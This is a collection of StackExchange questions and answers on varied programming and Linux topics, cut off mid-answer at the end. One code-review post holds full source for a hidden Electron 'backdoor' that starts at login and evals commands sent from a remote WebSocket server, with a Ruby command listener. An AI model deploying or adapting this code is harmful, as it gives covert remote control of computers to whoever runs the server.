_cs.4592 | Stephen Cook's proof of the NP-completeness of SAT is constructive. Given a Turing machine $M$, one can create a logical formula that is satisfiable if and only if $M$'s computation halts in an accepting state. This suggests that we could take a logical formula and create a Turing machine $M'$ whose computation is described by that formula, thereby creating an artificial problem solved by $M'$. Is it possible to use existing NP-complete problems to create other NP-complete problems? Can this be automated? | Creating artificial NP-Complete problems | algorithms;np complete | Dodging any questions about whether this is interesting or artificial (or whether Computer Science really needs any more NP-complete problems than it already has), the answer is yes. Pick a structure-preserving mapping between some set of strings and problem instances of 3SAT. Show that the mapping can be computed in polynomial time (i.e., it is a polytime reduction). Then, deciding if a string is in your set of strings is NP-complete. Repeat as desired (the composition of polytime reductions is a polytime reduction.)If you wanted to automate this process of creating new NP-complete problems, then it would likely be more efficient to construct the mappings from some base set of polytime mappings, using methods known to preserve polynomial time, rather than picking an arbitrary mapping and proving that it is a polytime reduction.Note that this is not quite what you suggest in your question. You can take a logical formula and build a Turing machine corresponding to it, but that in itself doesn't lead to an NP-complete problem. For instance, 2SAT instances can be decided in polynomial time. And a particular formula will only correspond to a particular machine, whereas you need a set of formulas (or machines) to define a complexity class; so to make new problems in NPC, you really need to show how one set can be converted into another (i.e. a polytime reduction), even if your sets are sets of logical formulas. |
_unix.115264 | I'm trying to upgrade my Fedora install from 19 (3.12.8-200.fc19.x86_64) to 20. I have installed and ran fedup, it creates a new entry on the boot list but a progress screen is briefly displayed and then it reboots back to Fedora 19.Here's what I tried:# yum install fedup# yum --enablerepo=updates-testing upgrade fedup# fedup --network 20# fedup-cli --network 20and by following this post:# yum install rpmconf; rpmconf -a # find /etc /var -name '*?.rpm?*' # yum install yum-utils; package-cleanup --leaves# package-cleanup --orphans # yum install fedup# fedup-cli --network 20 --debuglog /root/fedupdebug.logIs there a way to log what happens at the post-reboot stage? It seems to be failing at this phase. | Fedup fails to update Fedora 19 to 20 | fedora;upgrade | null |
_cs.73761 | I cannot go on with this exercise:Determine whether $L = \{a^nb^m \mid n > 2^m \}$ is context-free.Let's suppose that $L$ is context-free. According to the pumping lemma, there exists $N > 0$ such that every $z \in L$ of size at least $N$ has a decomposition $z = uvwxy$ such that$|vwx| \leq N$.$|vx| \geq 1$.For all $i \geq 0$, $z_i = uv^iwx^iy$ is in $L$.Let's use $z= a^{2^N+1}b^N$.Then$|z| = 2{^N+1} +N > N$ and $v= a^h$ and $x= b^k$ with $1 \leq h+k \leq N$.So $z_i = a^{2^N+1}a^{h(i-1)} b^{N-k}b^{k(i-1)}$.So if there exists $i > 0$ such that $2^N+1+h(i-1) \leq 2^{N+(i-1)k}$, then $z_i \notin L$.How can I go on to show that $L$ is not context-free? | Is the language $L=\{a^nb^m \mid n>2^m\}$ context-free? | context free;pumping lemma | null |
_unix.366730 | I am using cygwin on Windows 10. I can't seem to find any package named xv while in the cygwin setup. How can I use xv on Windows, using cygwin or otherwise? | Installing XV on Windows using cygwin | x11;cygwin;image viewer | As XV is not provided, you can try to compile it yourself. However, as the code is a bit old (the last version is from 1994), there is no guarantee that it will easily build on modern systems like current Cygwin: https://en.wikipedia.org/wiki/Xv_%28software%29 As there are several equivalent programs in cygwin, you can try one of them. |
_unix.130911 | I have an OpenElec based HTPC which boots from a USB stick. I would like to replace this with an SSD drive. What is the best way of copying the USB image to the SSD. Is this something that dd could do or would I be better off reinstalling on the SSD from scratch? | Replace USB stick boot device with SSD | usb drive;ssd | dd should work, if you want to use the same filesystem there.Unfortunately the new partition will have the same size; you probably need to enlarge the partition afterwards.Some partitioning tools allow you to copy data from one partition to another (the one in the debian installer does) but they might just use dd aswell.Of course should be capable of resizing the partition afterwards.Personally I would suggest using rsync with appropriate flags.I suggest rsync --archive --hard-links --acls --xattrs --one-file-system, that should get you pretty much everything.Please check the man page if these flags are right for you, you might not need --acls or --xattrs. But you should use --one-file-system or strange things will happen with /proc and the like. |
_softwareengineering.129259 | I really enjoy watching live code demos, especially when time is focused on what the code is doing instead of what the presenter is typing. Many seem to be using apps to manage their clipboard to paste code into the IDE. What apps are out there for skillfully managing your clipboard to seamlessly do a code demo?UPDATE:I found this app that Apple engineers use called DemoMonkey. It's actually an OS X app demo for, ironically enough, the clipboard and system services. The link includes the source so creating a PC equivalent would be easy, is there really nothing out there? | Apps for facilitating live code demos? | demonstration | null |
_unix.195034 | I got my laptop battery accidently disconnected, while the laptop was suspended to RAM. And now I'm experiencing these problems:When I'm trying to login to the system using sddm or kdm:after I enter my password - I'm getting mouse cursor and default wallpaper displayed and nothing happens after that.It doesn't matter if I'm trying to login to kde or to TWM.I've created a new user to test whether is it related to some user settings. It's not. The same thing happens for a new user.I can login to the tty console.I can perform startx and startkde with root credentionals and kde works just fine.But if I'm performing startx with standart user credentionals - twm starts and then my laptop ignoring any input (besides power button).My ~/.xsession-errors contains only the following line:sudo: no tty present and no askpass program specifiedI've already done fsck.Do you have any idea what I'm dealing with here?UPD:Some (probably relevant) info from journalctl. After the login attempt with sddm, I'm getting:dbus: [system] Failed to activate service 'org.freedesktop.login1': timed out sddm-helper: pam_systemd(sddm:session): failed to create session: connection timed out | *DM Login problems | arch linux;xorg;login;kdm | It was quite counterintuitive for me, but reinstalling sudo and editing sudoers file helped. |
_webapps.33618 | Can one ensure that certain people subscribe to a particular card in Trello? If not, one has to add an FYI or a CC to a list of people in each message. | Trello: Subscribe function | trello cards;trello lists | null |
_unix.96556 | I'm trying to create a monitoring system for a remote machine using an IPMI Serial Over Lan (SOL) console. The remote OS is RHEL 6, the mobo manufacturer is Supermicro. I've successfully enabled SOL redirection in the BIOS. This allows me to see the BIOS and kernel parts of bootup through an attached SOL console over IPMI. Next, I followed the steps mentioned in many online articles to get my OS ( runlevel 3, just text terminal ) to redirect too. The result is almost always the same :After making the changes to /etc/grub.conf, /etc/inittab, and /etc/securetty, i can see the grub menu through the SOL console (yay!), but as soon as the OS starts booting, my SOL terminal receives 1 gibberish character, and nothing more. Some thoughts: I'm not exaclty sure which serial port my BIOS are trying to redirect stuff into (ttyS0, ttyS1). Most of the examples use ttyS1, and since the grub menu gets redirected there, i'm pretty confident thats 'correct'I know the 'terminal types' and baud rates have to match between the BIOS and OS settings. I am consistently using 115200 for baud, but i'm less confident I'm choosing the right terminal type. The terminal type in BIOS is ANSI, and this gives the coloration i want for the BIOS over SOL. However, for the OS settings, most of the examples use 'linux'; i'm not sure if that's compatible with my ANSI setting. I've tried VT100 for both BIOS and OS, and I still never see anything past the Grub menu (plus, i lose color info for my BIOS over SOL).Any help is greatly appreciated. | Serial Over Lan redirection stops at OS boot | linux;serial port;rhel | null |
_softwareengineering.189136 | I'm really struggling to write effective unit tests for a large Django project. I have reasonably good test coverage, but I've come to realize that the tests I've been writing are definitely integration/acceptance tests, not unit tests at all, and I have critical portions of my application that are not being tested effectively. I want to fix this ASAP.Here's my problem. My schema is deeply relational, and heavily time-oriented, giving my model object high internal coupling and lots of state. Many of my model methods query based on time intervals, and I've got a lot of auto_now_add going on in timestamped fields. So take a method that looks like this for example:def summary(self, startTime=None, endTime=None): # ... logic to assign a proper start and end time # if none was provided, probably using datetime.now() objects = self.related_model_set.manager_method.filter(...) return sum(object.key_method(startTime, endTime) for object in objects)How does one approach testing something like this? Here's where I am so far. It occurs to me that the unit testing objective should be given some mocked behavior by key_method on its arguments, is summary correctly filtering/aggregating to produce a correct result?Mocking datetime.now() is straightforward enough, but how can I mock out the rest of the behavior? I could use fixtures, but I've heard pros and cons of using fixtures for building my data (poor maintainability being a con that hits home for me).I could also setup my data through the ORM, but that can be limiting, because then I have to create related objects as well. And the ORM doesn't let you mess with auto_now_add fields manually.Mocking the ORM is another option, but not only is it tricky to mock deeply nested ORM methods, but the logic in the ORM code gets mocked out of the test, and mocking seems to make the test really dependent on the internals and dependencies of the function-under-test.The toughest nuts to crack seem to be the functions like this, that sit on a few layers of models and lower-level functions and are very dependent on the time, even though these functions may not be super complicated. My overall problem is that no matter how I seem to slice it, my tests are looking way more complex than the functions they are testing. | Unit testing in Django | testing;unit testing;django | null |
_softwareengineering.191303 | If I split one class into two classes should both classes have history in source control tracing back to the original class that contained both; or should the new class be added as a new file without any history tracing back?When splitting a large class into two similar sized parts this seems like the natural approach since the older versions of the combined class will have large amounts of relevant history for both descendents. When I'm just pulling one or two methods out to create a helper class, having the complete history for the new class be >90% changes in the parent that affected code that wasn't split out seems like a recipe for confusion in the future. | Should a new class refactored out of an existing one have history pointing back to it's progenitor | version control;refactoring | It's much easier to ignore some history later than to try to splice it back in. In general you want to favor the least destructive option. People primarily review source control history for three reasons:To find out which change introduced a bug.To discern the reasons why a section of code is in there.To find out what has changed since the last release or the last time you updated.Copying history for a split file contributes little if any confusion for any of those use cases. The worst that happens is you have to sift through some irrelevant commits, and you generally have to do that anyway. On the other hand, not having the history past a certain point makes the first two use cases much more difficult. |
_codereview.29914 | I forked this repo to be more concise. The code is here. I'll paste it below since that seems to be the style. I removed the class definitions at the bottom that I didn't change -- the edit I'm concerned with is the use of the class_factory function at the bottom. Is this good? Pythonic? from selenium.webdriver import DesiredCapabilitiesfrom selenium.webdriver.firefox.webdriver import WebDriver as _Firefoxfrom selenium.webdriver.chrome.webdriver import WebDriver as _Chromefrom selenium.webdriver.ie.webdriver import WebDriver as _Iefrom selenium.webdriver.remote.webdriver import WebDriver as _Remotefrom selenium.webdriver.phantomjs.webdriver import WebDriver as _PhantomJSfrom webdriverplus.utils import _downloadfrom webdriverplus.webdriver import WebDriverDecoratorfrom webdriverplus.webelement import WebElementimport atexitimport osimport socketimport subprocessimport timetry: from urllib2 import URLErrorexcept ImportError: from urllib.error import URLErrorVERSION = (0, 2, 0)def get_version(): return '%d.%d.%d' % (VERSION[0], VERSION[1], VERSION[2])class WebDriver(WebDriverDecorator): _pool = {} # name -> (instance, signature) _quit_on_exit = set() # set of instances _selenium_server = None # Popen object _default_browser_name = 'firefox' @classmethod def _at_exit(cls): Gets registered to run on system exit. if cls._selenium_server: cls._selenium_server.kill() for driver in cls._quit_on_exit: try: driver.quit(force=True) except URLError: pass @classmethod def _clear(cls): cls._pool.clear() @classmethod def _get_from_pool(cls, browser): Returns (instance, (args, kwargs)) return cls._pool.get(browser, (None, (None, None))) def __new__(cls, browser=None, *args, **kwargs): browsers = {'firefox':Firefox, 'chrome':Chrome, 'ie':Ie, 'remote':Remote, 'phantomjs':PhantomJS, 'htmlunit':HtmlUnit} quit_on_exit = kwargs.get('quit_on_exit', True) reuse_browser = kwargs.get('reuse_browser') signature = (args, kwargs) browser = browser or cls._default_browser_name reused_pooled_browser = False pooled_browser = None try: is_str = isinstance(browser, basestring) except NameError: is_str = isinstance(browser, str) if is_str: browser = browser.lower() pooled_browser, pooled_signature = WebDriver._get_from_pool(browser) if pooled_signature == signature: driver = pooled_browser reused_pooled_browser = True elif browser in browsers.keys(): driver = browsers[browser](*args, **kwargs) else: raise BrowserNotSupportedError() # If a WebDriverDecorator/WebDriver is given, add it to the pool elif isinstance(browser, WebDriverDecorator): driver = browser browser = driver.name else: kwargs['driver'] = browser driver = WebDriverDecorator(*args, **kwargs) browser = driver.name if reuse_browser and not reused_pooled_browser: if pooled_browser: pooled_browser.quit(force=True) WebDriver._pool[browser] = (driver, signature) if quit_on_exit: WebDriver._quit_on_exit.add(driver) return driver def __init__(self, browser='firefox', *args, **kwargs): pass # Not actually called. 
Here for autodoc purposes only.atexit.register(WebDriver._at_exit)browser_types = ({'name':'Firefox', 'driver':_Firefox}, {'name':'Chrome', 'driver':_Chrome}, {'name':'Ie', 'driver':_Ie}, {'name':'Remote', 'driver':_Remote}, {'name':'PhantomJS', 'driver':_PhantomJS},)def class_factory(browser_type, bases): class Class_(*bases): def __init__(self, *args, **kwargs): kwargs['driver'] = browser_type['driver'] super().__init__(*args, **kwargs) Class_.__name__ = browser_type['name'] return Class_for browser_type in browser_types: globals()[browser_type['name']] = class_factory(browser_type, (WebDriverDecorator,)) | Streamlining repetitive class definitions in python with a class_factory() function | python;classes;python 3.x;meta programming | It's not unknown: python is really good at this, although the more common approach would be to use a metaclass. The immediate drawbacks are1) it introduces a state-changing dependency to the import statement. If code that is using this code gets imported in a non-standard way you may get confusing errors because types will or will not appear depending on when this module gets run. It's not a major issue if this code will be imported directly but it's potentially problematic if there is more magic going on elsewhere.2) less importantly, it's going to play hell with IDE's that try to do autocomplete for you :)I'm guessing that the super().init idiom is a python 3 replacement for type('Name', (),{}) by it's form. If it's not - that is the old way to create a runtime type and it avoids creating and renaming the Class_ class, which seems messy to me. Examples of the 'old way' hereLastly: this seems like classes that differ only in data, or to be more precise in composition. In cases like that I've always found it more maintainable to do it declaratively with class-level variables and appropriate indirections:class Browser(object): BROWSER = 'browser' DRIVER = None @property def name(self): return self.BROWSER def do_something(self): self.DRIVER.do_something()class Firefox(Browser): BROWSER = 'Firefox' DRIVER = _Firefoxclass Chrome (Browser): BROWSER = 'Chrome' DRIVER = _ChromeDoing this allows you to do subclassing and overrides as appropriate, which is much hairier with types that have to be created before they can be changed. |
_softwareengineering.315847 | Suppose we have a set of binary trees with their inorder and preorder traversals given and where no tree is a subtree of another tree in the given set. Now another binary tree Q is given.Find whether it can be formed by joining the binary trees from the given set(while joining each tree in the set should be considered atmost once). In this case a joining operation means: Pick the root of any tree in the set and hook it to any vertex of another tree such that the resulting tree is also a binary tree.Can we do this using LCA (least common ancestor)? Or does it needs any special datastructure to solve? | Joining binary trees | data structures;binary tree | null |
_codereview.129629 | I have created an Electron Application with a JavaScript/NodeJS Backdoor and a Ruby command-line listener.I created this program for remote administration of my home computer securely using a new technology (WebSockets) which I found very interesting.The program is two parts: The Electron application written in JavaScript which includes a JavaScript backdoor using WebSockets.A Ruby command-line WebSocket listener with the ability to communicate and send commands to the Electron application.I'd love any general suggestions or fixes!Feel free to only look at the client or server based on if you only know JavaScript or Ruby.You may ignore anything that says TODO because this site is not about fixing non functioning code.The project is also available on Github.To download all the code you can use:git clone https://github.com/IMcPwn/browser-backdoorclient/main.js (the Electron application)/* * BrowserBackdoor - https://github.com/IMcPwn/browser-backdoor * BrowserBackdoor is an electron application that uses a JavaScript backdoor (in index.html) * to connect to the listener (BrowserBackdoorServer). * For more information visit: http://imcpwn.com * MIT License * Copyright (c) 2016 Carleton Stuberg * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the Software), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */const electron = require('electron')const AutoLaunch = require('auto-launch');const app = electron.app;const dialog = electron.dialog;const globalShortcut = electron.globalShortcut;const BrowserWindow = electron.BrowserWindow;const Menu = electron.Menu;// Keep a global reference of the window object so it doesn't get garbage collected.let mainWindow;// Passing true enables startup, false disables startup.function manageStartup(enable) { let appLauncher = new AutoLaunch({ // Change this to the name of the application or what // should appear in the startup menu. name: 'BB' }); if (enable) { appLauncher.isEnabled().then(function(enabled){ if(enabled) return; return appLauncher.enable(); }).then(function(err){ // TODO: Deal with error }); } else { appLauncher.isEnabled().then(function(enabled){ if(!enabled) return; return appLauncher.disable(); }).then(function(err){ // TODO: Deal with error }); }}function createWindow() { // Change CommandOrControl+Alt+\ to the shortcut to manage the application. globalShortcut.register('CommandOrControl+Alt+\\', function () { let result = dialog.showMessageBox({ type: 'info', title: 'Shortcut pressed', message: 'You pressed the keyboard shortcut. 
\nIf you do not know what you are doing press cancel.', buttons: ['Quit Application', 'Enable Startup', 'Disable Startup', 'Cancel'] }); if (result === 0) { mainWindow = null; app.exit(0); } else if (result === 1) { manageStartup(true); } else if (result === 2) { manageStartup(false); } }); // Create a hidden browser window which loads the backdoor. mainWindow = new BrowserWindow({ width: 1, height: 1, show: false, closable: false, transparent: true, resizable: false, skipTaskbar: true }); mainWindow.loadURL(`file://${__dirname}/index.html`); // Hide application menu. Menu.setApplicationMenu(null); mainWindow.on('closed', function() { mainWindow = null; });}// Only allow one instance of the application at a time.const shouldQuit = app.makeSingleInstance((commandLine, workingDirectory) => { if (mainWindow === null) { createWindow(); }});if (shouldQuit) { mainWindow = null; app.exit(0);}// Hide application from tray if on OS X.if (process.platform === 'darwin') { app.dock.hide();}// Catch uncaughtExceptions so no popups appear on errors.process.on('uncaughtException', function ( err ) { // TODO: Restart application or print error message console.error('An uncaughtException was found, the program will end.'); process.exit(1);});// Accept --startup as command line argument to enable on startup.process.argv.forEach(function (val, index, array) { if (val === --startup) { manageStartup(true); }});app.on('before-quit', function() { mainWindow = null;});app.on('will-quit', function() { globalShortcut.unregisterAll()});// This method will be called when Electron has finished// initialization and is ready to create browser windows.app.on('ready', createWindow)// Re-open if all windows are closed.app.on('window-all-closed', function() { createWindow();});app.on('activate', function() { // Create window if activated and it doesn't already exist. if (mainWindow === null) { createWindow(); }});client/package.json (required for the Electron application){ name: BrowserBackdoor, version: 1.0.0, description: Electron application to connect to BrowserBackdoorServer, main: main.js, scripts: { start: electron main.js }, repository: { type: git, url: git+https://github.com/IMcPwn/browser-backdoor.git }, author: Carleton Stuberg, license: MIT, bugs: { url: https://github.com/IMcPwn/browser-backdoor/issues }, homepage: https://github.com/IMcPwn/browser-backdoor, devDependencies: { electron-prebuilt: ^1.1.2, auto-launch: 2.0.1 }}client/index.html (the JavaScript backdoor)<!DOCTYPE html><html><head> <script> /* * Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com * BrowserBackdoor - https://github.com/IMcPwn/browser-backdoor * See the file 'LICENSE' for copying permission */ (function connect() { if (WebSocket in window) { // Change host and port to where you're hosting // the WebSocket server. // Also change ws:// to wss:// if secure is enabled on the // server. var ws = new WebSocket(ws://your-server-here:1234); ws.onmessage = function(evt) { if (ws.readyState === 1) { // Send the result of eval'ing the remote message. ws.send(eval(evt.data)); } }; ws.onclose = function() { // Reconnect after 5 seconds. 
setTimeout(connect, 5000); }; } })(); </script></head><body></body></html>server/bb-server.rb (The listener)#!/usr/bin/env ruby# BrowserBackdoorServer - https://github.com/IMcPwn/browser-backdoor# BrowserBackdoorServer is a WebSocket server that listens for connections # from BrowserBackdoor and creates an command-line interface for # executing commands on the remote system(s).# For more information visit: http://imcpwn.com# MIT License# Copyright (c) 2016 Carleton Stuberg# Permission is hereby granted, free of charge, to any person obtaining a copy# of this software and associated documentation files (the Software), to deal# in the Software without restriction, including without limitation the rights# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell# copies of the Software, and to permit persons to whom the Software is# furnished to do so, subject to the following conditions:# The above copyright notice and this permission notice shall be included in all# copies or substantial portions of the Software.# THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE# SOFTWARE.require 'em-websocket'require 'yaml'# TODO: Make all the variables besides $wsList non global.$wsList = Array.new$selected = -1COMMANDS = { help => Help menu, exit => Quit the application, sessions => List active sessions, use => Select active session, info => Get session information (IP, User Agent), exec => Execute a command on a session, get_cert => Get a free TLS certificate from LetsEncrypt, load => Load a module (not implemented yet)}WELCOME_MESSAGE = \ ____ ____ _ _ \n\| _ \ | _ \ | | | | \n\| |_) |_ __ _____ _____ ___ _ __| |_) | __ _ ___| | ____| | ___ ___ _ __ \n\| _ <| '__/ _ \ \ /\ / / __|/ _ \ '__| _ < / _' |/ __| |/ / _' |/ _ \ / _ \| '__|\n\| |_) | | | (_) \ V V /\__ \ __/ | | |_) | (_| | (__| < (_| | (_) | (_) | | \n\|____/|_| \___/ \_/\_/ |___/\___|_| |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_| by IMcPwn\n\Visit http://imcpwn.com for more information.\ndef main() begin configfile = YAML.load_file(config.yml) Thread.new{startEM(configfile['host'], configfile['port'], configfile['secure'], configfile['priv_key'], configfile['cert_chain'])} rescue => e puts 'Error loading configuration' puts e.message puts e.backtrace return end cmdLine()enddef print_error(message) puts [X] + messageenddef print_notice(message) puts [*] + messageenddef infoCommand() # TODO: Improve method of getting IP address infoCommands = [var xhttp = new XMLHttpRequest();xhttp.open(\GET\, \https://ipv4.icanhazip.com/\, false);xhttp.send();xhttp.responseText,navigator.appVersion;, navigator.platform;, navigator.language;] infoCommands.each {|cmd| begin sendCommand(cmd, $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) break end }enddef sessionsCommand() if $wsList.length < 1 puts No sessions return end puts ID: Connection $wsList.each_with_index {|val, index| puts index.to_s + : + val.to_s }enddef execCommand(cmdIn) if cmdIn.length < 2 loop do print Enter the command to send. 
(exit when done)\nCMD-#{$selected}> cmdSend = gets.split.join(' ') break if cmdSend == exit next if cmdSend == begin sendCommand(cmdSend, $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) end end else # TODO: Support space begin sendCommand(cmdIn[1], $wsList[$selected]) rescue print_error(Error sending command. Selected session may no longer exist.) end endenddef useCommand(cmdIn) if cmdIn.length < 2 print_error(Invalid usage. Try help for help.) return end selectIn = cmdIn[1].to_i if selectIn > $wsList.length - 1 print_error(Session does not exist.) return end $selected = selectIn print_notice(Selected session is now + $selected.to_s + .)enddef cmdLine() puts WELCOME_MESSAGE print \nWebSocket listener is now running...\nEnter help for help. loop do print \n> cmdIn = gets.chomp.split() case cmdIn[0] when help COMMANDS.each do |key, array| print key print --> puts array end when exit break when sessions sessionsCommand() when use useCommand(cmdIn) when info if validSession?($selected) infoCommand() else next end when exec if validSession?($selected) execCommand(cmdIn) else next end when get_cert if File.file?(getCert.sh) system(./getCert.sh) else print_error(getCert.sh does not exist) end else print_error(Invalid command. Try help for help.) end endenddef validSession?(selected) if selected == -1 print_error(No session selected. Try use SESSION_ID first.) return false elsif $wsList.length < $selected print_error(Session no longer exists.) return false end return trueenddef sendCommand(cmd, ws) ws.send(cmd)enddef startEM(host, port, secure, priv_key, cert_chain) EM.run { EM::WebSocket.run({ :host => host, :port => port, :secure => secure, :tls_options => { :private_key_file => priv_key, :cert_chain_file => cert_chain } }) do |ws| $wsList.push(ws) ws.onopen { |handshake| print_notice(WebSocket connection open: + handshake.to_s) } ws.onclose { print_error(Connection closed) $wsList.delete(ws) # TODO: Fix this. Reset selected error so the wrong session is not used. $selected = -1 } ws.onmessage { |msg| print_notice(Response received: + msg) } ws.onerror { |e| print_error(e.message) $wsList.delete(ws) # Reset selected variable after error $selected = -1 } end }endmain()server/config.yml (Configuration for the listener)## Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com# BrowserBackdoorServer by IMcPwn.# See the file 'LICENSE' for copying permission#host: 0.0.0.0port: 1234# Requires valid private key and certificate.secure: falsepriv_key: privkey.pemcert_chain: cert.pemGemfile (The listener's gems)## Copyright (c) 2016 Carleton Stuberg - http://imcpwn.com# BrowserBackdoorServer by IMcPwn.# See the file 'LICENSE' for copying permission#source 'https://rubygems.org'gem 'eventmachine'gem 'em-websocket' | Electron Application with JavaScript Backdoor and Ruby Command-Line Listener | javascript;ruby;node.js;websocket | null |
_unix.68590 | Is there a way to set up squid (or another caching proxy) to cache any http/https request from my own computer? I will use it to record all requests and retrieve the downloaded files from software that does not show the URLs, and to avoid re-downloading packages that have already been downloaded (such as with Yaourt, which always re-downloads packages it has already fetched; that wastes a lot of bandwidth for big packages). | Self cache-proxying all outgoing http/https requests | proxy;http proxy | null |
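For the HTTP side of the question above, a plain caching proxy is enough; a minimal, illustrative squid.conf sketch (paths and sizes are placeholders, untested) might look like:

# /etc/squid/squid.conf
http_port 3128
cache_dir ufs /var/spool/squid 20000 16 256     # ~20 GB on-disk cache
maximum_object_size 2048 MB                     # keep big package downloads cacheable
refresh_pattern . 0 20% 4320
access_log /var/log/squid/access.log            # records every requested URL

Clients then point at it with http_proxy=http://localhost:3128. HTTPS is the hard part: squid can only cache https responses when configured for TLS interception (ssl_bump), which requires generating a local CA and trusting it on every client, so it is not covered by this sketch.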
_codereview.147691 | I've just solved this problem and I hope you guys give me any feedback to make my code be better.Problem: There are N strings. Each string's length is no more than 20 characters. There are also Q queries. For each query, you are given a string, and you need to find out how many times this string occurred previously.Input FormatThe first line contains N, the number of strings. The next N lines each contain a string. The N+2nd line contains Q, the number of queries. The following Q lines each contain a query string.import java.io.*;import java.util.*;public class Solution { public static void main(String[] args) { Scanner scan = new Scanner(System.in); int n = scan.nextInt(); String[] stringArr = new String[n]; for (int i = 0; i < n; i++){ stringArr[i] = scan.next(); } int q = scan.nextInt(); for (int i = 0; i < q; i++){ String stringQue = scan.next(); int occNum = 0; for (int j = 0; j < n; j++){ if (stringQue.equals(stringArr[j])) occNum++; } System.out.println(occNum); } }} | Hackerrank Sparse Arrays Solution in Java | java;programming challenge;array | null |
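One follow-up on the question above: the posted solution re-scans all N stored strings for every query, which is O(N*Q). A common alternative is to count occurrences once in a HashMap and answer each query in O(1); a sketch in the same style as the original (class name is hypothetical):

import java.util.HashMap;
import java.util.Map;
import java.util.Scanner;

public class SolutionWithMap {
    public static void main(String[] args) {
        Scanner scan = new Scanner(System.in);
        int n = scan.nextInt();
        Map<String, Integer> counts = new HashMap<>();
        for (int i = 0; i < n; i++) {
            String s = scan.next();                        // read each stored string once
            counts.put(s, counts.getOrDefault(s, 0) + 1);  // ... and count it
        }
        int q = scan.nextInt();
        for (int i = 0; i < q; i++) {
            System.out.println(counts.getOrDefault(scan.next(), 0));
        }
        scan.close();
    }
}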
_unix.82472 | I want to delete only the first occurrence of a character in a string.Example:echo B123_BACK | tr -d 'B'This results in output:123_ACKHow can I delete only the first occurrence of the character 'B' so that the output looks like 123_BACK? | Delete only first occurrence of character using tr | tr | Looking at the tr man page, this isn't possible. Why not use sed instead:echo B123_BACK|sed 's/B//' |
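In shells with ksh-style parameter expansion (bash, ksh, zsh), the same one-off deletion needs no external tool, since ${var/pattern/} replaces only the first match:

s=B123_BACK
echo "${s/B/}"    # prints 123_BACK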
_webapps.39683 | I updated the gravatar for my e-mail address (a few days ago), but GitHub Enterprise is still displaying the old one. How do I force it to refresh? | How do I force GitHub Enterprise to refresh gravatar? | github;gravatar | This fix is easy. I will confirm this works since I work at the same organization as Brian Knoblauch. Simply navigate to ${github.url}/stafftools and navigate down to the 'enable gravatars' option (under settings tab) and enable it. The server will restart and your gravatars will now appear. |
_cogsci.5900 | A while back I created an iPhone app that helps me create a composite like the one below. Can observing such a composite have an impact of attributing the qualities perceived in the composite to oneself? For example feeling more open or extraverted.http://luciddreamingapp.com/wp-content/uploads/2012/01/Augmented-Reality-Alexander-Stone-37percent-with-Average-attractive-male-200x300.pngThe reason I'm asking is that I foundthis answer to question about facial features and personality. Within an answer, there's a link to this paper: Personality judgments from natural and composite facial images.The paper suggests that ordinary, untrained people are capable of naturally recognizing and rating a face on a big 5 personality traits. The author proceeds to show that composite faces that are rated high on the socially - desirable traits, like extraversion, openness and agreeableness are rated as more attractive by the study's test subjects:Here are the attractiveness ratings summary from the male faces above:When using my app, the user's brain is tricked into recognizing the composite image as one's own, because it is made of a live camera image + static image, and the image can blink, smile, frown, etc. The brain merges the two images, potentially distorting the true geometry of one's face by perceiving a composite image.Here is a quote from that article on the self fulfilling prophesy effect (page 635):For example, people with facial features that elicit attributions of agreeableness may be treated as more trustworthy and may perhaps consequently develop more agreeable personality characteristics.I'm interested if perceiving such composite can activate the same mechanisms used to judge other faces, thus creating the same self-fulfilling prophesy and having an impact on one's personality?Probably a part of the answer to the question is in answering the question: does one's own image in the mirror affect one's personality? | Can observing a composite photo of one's own face have an impact on own personality? | social psychology;perception;personality | null |
_softwareengineering.323541 | I have a Windows Form for creating configs. It has around 50 fields of data, which represent a group of entities, that I need to capture when the user presses the save button. Currently, on the press of the save button I build the group of Entities by creating each entity, extracting the information from the controls and then save them to the database.I am now working on functionality to import the partly built configs from XML. With the way the save button works I would be replicating almost all of the save code to achieve this.The only alternative I think of was to pass the values of the controls as parameters to a new class that will contain methods that build and return an entity. However, passing ~15 parameters to each entity creator method does not seem to be a clean solution.Is there any clean way of disconnecting the save logic from the WinForm that will enable me to reuse the save code? | Separating save logic from WinForm to make it reusable | design;entity framework;winforms;separation of concerns | Start with some building blocks first:make a class MyConfigData, a simple DTO object, no special logic here. It should hold all the configuration data you want to manageimplement methods void SetData(MyConfigData config) and MyConfigData GetData() in your form - these two methods should transfer the data from the DTO object into the form, and vice versa.create a class ConfigDbRepo with a method Save(MyConfigData config) and MyConfigData Load(). Put the database load and save logic here.put the code to load and save the config data from or to an XML file in a similar class ConfigXmlRepo. If you like, the two classes can have a common interface IConfigRepo, but that is not mandatory.What remains is to connect these pieces together. How you will do this depends somewhat on how your application works in general, if your form is modal or non-modal, and how exactly your application controls when to load/save from a db and when to load/save to an XML file. But I hope it is clear that with these tools you can load a config from an 